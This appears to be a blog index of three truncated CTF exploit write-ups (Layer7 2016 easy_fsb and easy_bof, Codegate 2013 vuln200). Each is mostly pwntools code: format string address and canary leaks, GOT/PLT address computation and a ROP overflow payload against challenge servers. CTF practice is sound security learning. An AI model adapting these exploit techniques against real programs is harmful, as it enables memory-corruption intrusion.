2016 Layer7 CTF easy_fsb exploit only

For someone like me who is weak at FSB (format string bugs), this was a hard problem to solve. Stupidly, I wasted time because I didn't know that %hn writes 2 bytes, and wasted more time because I didn't know that using %s lets you leak an address. I got help from my teammate Minjeong.

    from pwn import *
    conn = remote('prob.layer7.kr', 10002)
    payload = "%75$x\n"
    conn.send(payload)
    libc_start = int(conn.recv(8),16) - 247
    print "libc_start : " + hex(libc_start)
    system_libc = 0x0003A920 - 0x00018540
    system_addr = system_libc + libc_start
    printf_got = 0x0804A01..

2016 Layer7 CTF easy_bof exploit only

    from pwn import *
    conn = remote('prob.layer7.kr', 10003)
    payload = "2147483650\n"
    payload += "%43$lx%41$lx"
    conn.send(payload)
    canary = conn.recv(16)
    start = conn.recv(12)
    print "canary : " + canary
    print "start : " + start
    base_addr = int(start,16) - 0x7e0
    printf_plt = base_addr + 0x00000000000007A0
    fflush_got = base_addr + 0x0000000000200FD8
    puts_plt = base_addr + 0x0000000000000790
    puts_got = base..

codegate 2013 vuln200 from rop exploit only

    from pwn import *
    elf = ELF('/usr/local/src/pwn/vuln200/vuln200')
    recv_plt,send_plt = elf.plt['recv'], elf.plt['send']
    recv_got,send_got = elf.got['recv'], elf.got['send']
    ppppr = 0x080493AC
    vuln = 0x08048EEB
    conn = remote("localhost", 7777)
    bss = 0x0804B0E0
    payload = "write"
    payload += "A" * 236
    payload += "AAAA"
    payload += p32(send_plt) # ret
    payload += p32(ppppr) # argv1
    payload += p32(4) # fd
    payl..